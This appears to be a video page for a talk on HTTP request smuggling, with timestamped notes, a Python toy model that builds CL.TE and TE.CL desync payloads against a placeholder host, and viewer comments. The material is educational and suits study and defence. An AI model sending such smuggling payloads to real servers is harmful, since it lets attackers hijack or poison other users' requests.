Trying to get an absolutely in-depth understanding of each major vulnerability type; this has helped with my smuggling step.
01:10 interest: low-stack system/integration/protocol bugs
01:27 agenda
02:04 quick introduction, CL.TE / TE.CL
"HTTP Desync Attacks: Smashing into the Cell Next Door", James Kettle, th-cam.com/video/w-eJM2Pc0KI/w-d-xo.html
Watchfire paper, 2005: shorturl.at/cfstN
======================================
CL.TE Desync Attack
======================================
03:21 CL.TE, which is front-end/back-end
03:35 the front-end will interpret a web request using its content-type header and the back-end will interpret the same request using the Transfer-Encoding header
03:51 here we have an attacker, POST request, TE header is malformed
04:18 back-end ignores the Content-Length
=============================
TE.CL Desync Attack
=============================
05:58 [...]
08:14 testing for request smuggling
08:37 github.com/defparam/smuggler
09:58 impact radius of request smuggling
10:14 Open Desync, the most dangerous of the three
10:28 IP Desync
10:51 Self Desync, VPN, VPS
=============================
Practical Attack
=============================
11:20 recon stories
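As an added illustration of the CL.TE and TE.CL split described in the notes above (example code written for this page, not code from the talk, from the smuggler tool or from NahamSec), here is a toy model in which one byte stream is carved into requests twice: once by a parser that honours Content-Length and once by one that honours chunked Transfer-Encoding. The hostname vulnerable.example, the /login path and the "victim" request are all constructed for the demo.

```python
# Toy model of a CL.TE / TE.CL desync: one byte stream, two framing rules.
# Example code added to these notes; not from the talk or its tools.
# vulnerable.example, /login and the victim request are constructed inputs.


def _read_chunked(buf: bytes, pos: int):
    """Consume a chunked body starting at pos; return the offset just past it.

    Returns None if the stream ends before the terminating zero-size chunk.
    """
    while True:
        eol = buf.find(b"\r\n", pos)
        if eol < 0:
            return None
        size_field = buf[pos:eol].split(b";")[0].strip().decode("latin-1")
        size = int(size_field, 16)
        pos = eol + 2
        if size == 0:
            # zero-size chunk: optional trailers, then an empty line ends the body
            while True:
                eol = buf.find(b"\r\n", pos)
                if eol < 0:
                    return None
                line, pos = buf[pos:eol], eol + 2
                if not line:
                    return pos
        if pos + size + 2 > len(buf):
            return None
        pos += size + 2  # chunk data plus its trailing CRLF


def split_requests(stream: bytes, honour: str) -> tuple[list[bytes], bytes]:
    """Split a stream into HTTP/1.1 requests as a CL- or TE-honouring parser would.

    honour="CL": body length comes from Content-Length; Transfer-Encoding is ignored.
    honour="TE": a chunked Transfer-Encoding wins; Content-Length is only a fallback.
    Returns (complete requests, unparsed leftover bytes).
    """
    if honour not in ("CL", "TE"):
        raise ValueError("honour must be 'CL' or 'TE'")
    reqs, pos = [], 0
    while pos < len(stream):
        hdr_end = stream.find(b"\r\n\r\n", pos)
        if hdr_end < 0:
            break  # incomplete header block: wait for more bytes
        headers = {}
        for line in stream[pos:hdr_end].decode("latin-1").split("\r\n")[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        body_start = hdr_end + 4
        if honour == "TE" and "chunked" in headers.get("transfer-encoding", "").lower():
            end = _read_chunked(stream, body_start)
        else:
            end = body_start + int(headers.get("content-length", "0"))
            if end > len(stream):
                end = None
        if end is None:
            break  # incomplete body: wait for more bytes
        reqs.append(stream[pos:end])
        pos = end
    return reqs, stream[pos:]


def request_line(req: bytes) -> str:
    return req.split(b"\r\n", 1)[0].decode("latin-1")


def cl_te_payload() -> bytes:
    # Front-end (CL) forwards all 6 body bytes; back-end (TE) stops after the
    # zero-size chunk and treats the trailing "G" as the start of the next request.
    body = b"0\r\n\r\nG"
    return (b"POST / HTTP/1.1\r\nHost: vulnerable.example\r\n"
            + f"Content-Length: {len(body)}\r\n".encode()
            + b"Transfer-Encoding: chunked\r\n\r\n" + body)


def te_cl_payload() -> bytes:
    # Front-end (TE) reads one chunk holding a whole smuggled request; back-end (CL)
    # stops after the chunk-size line and parses the smuggled request on its own.
    inner_body = b"x=1"
    terminator = b"\r\n0\r\n\r\n"  # ends the chunked body; the back-end swallows it as body
    smuggled = (b"GPOST /login HTTP/1.1\r\nHost: vulnerable.example\r\n"
                + f"Content-Length: {len(inner_body) + len(terminator)}\r\n".encode()
                + b"\r\n" + inner_body)
    size_line = f"{len(smuggled):x}\r\n".encode()
    return (b"POST / HTTP/1.1\r\nHost: vulnerable.example\r\n"
            + f"Content-Length: {len(size_line)}\r\n".encode()
            + b"Transfer-Encoding: chunked\r\n\r\n"
            + size_line + smuggled + terminator)


VICTIM = (b"POST /login HTTP/1.1\r\nHost: vulnerable.example\r\n"
          b"Content-Length: 11\r\n\r\nuser=victim")


def desync_view(name: str) -> dict:
    """Request lines each side sees for attacker payload followed by the victim's request."""
    front, back, payload = {"CL.TE": ("CL", "TE", cl_te_payload()),
                            "TE.CL": ("TE", "CL", te_cl_payload())}[name]
    stream = payload + VICTIM
    front_reqs, _ = split_requests(stream, front)
    back_reqs, _ = split_requests(stream, back)
    return {"front_end": [request_line(r) for r in front_reqs],
            "back_end": [request_line(r) for r in back_reqs]}


if __name__ == "__main__":
    for case in ("CL.TE", "TE.CL"):
        view = desync_view(case)
        print(case, "front-end sees:", view["front_end"])
        print(case, "back-end sees: ", view["back_end"])
```

In the CL.TE case the back-end turns the victim's `POST /login` into `GPOST /login`, which is the classic detection signal; in the TE.CL case the back-end processes a `GPOST /login` request the front-end never saw as a request at all. Real servers differ in how they tolerate malformed chunk sizes or obfuscated `Transfer-Encoding` values, which is what the talk's "malformed TE header" remark is about; this model only covers the clean case.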
Mind blown! Felt sorry for sysadmins for the consequences of his very last attack in this presentation. Highly impactful attack indeed.
Wem
@chasejensen88 one year later )
Exactly what I need. Impressive stuff!
The stuff is really great. Thanks a lot!!
Thank you for sharing. One of the greatest teaching classes I ever had.
Cool PoC, great session on the HTTP smuggling attack.
Seeing the view count gives me the warm n fuzzies cus I know I'm super early to the party.
You ladies and gents are super rad and I couldn't be more excited to start hunting.
18:48 recon story #2 is about api.zomato.com 🕵️, got a bounty of 15k USD
The last one was mind blowing
Does HTTP request smuggling just work on the POST method, or also on GET? I have heard it just works on the POST method.
Is there a GitHub page for the test server? I wanna test myself.
14:40 the takeaway, I love it. I was in talks with a pretty big sec tech company. One of their guys tried to act like a wise guy: there is no risk with a robots.txt. OK, sure, kiddo.
Hello sir. I have a question; I couldn't find out how to do that. There are 15 numbers from 1 to 15. It can generate any number randomly. How can we identify which number is being generated?
Hi Nahamsec,
Can you share the lab so I can practice?
This was truly amazing
Amazing stuff ! thanks a lot
Thanks
Thank you
I needed this.
This was fascinating!
Amazing stuff
Thank you!
Why don't you people invite IppSec?
How can the attacker poison HTTP, but the victim accesses HTTPS?
Can it still work or not? If it works, how?
In this vulnerability, there is no key difference between HTTP and HTTPS, but the thing you must look for is the HTTP version; if it's HTTP/2.0 then you have to try other ways to exploit it, by downgrading the HTTP version to 1.
@omarataallah9451 Oh, that's about the HTTP version, not HTTP/HTTPS? Am I right?
@hidayatbachtar true
This is GOLD!
Wow, amazing
Tcm hair 😂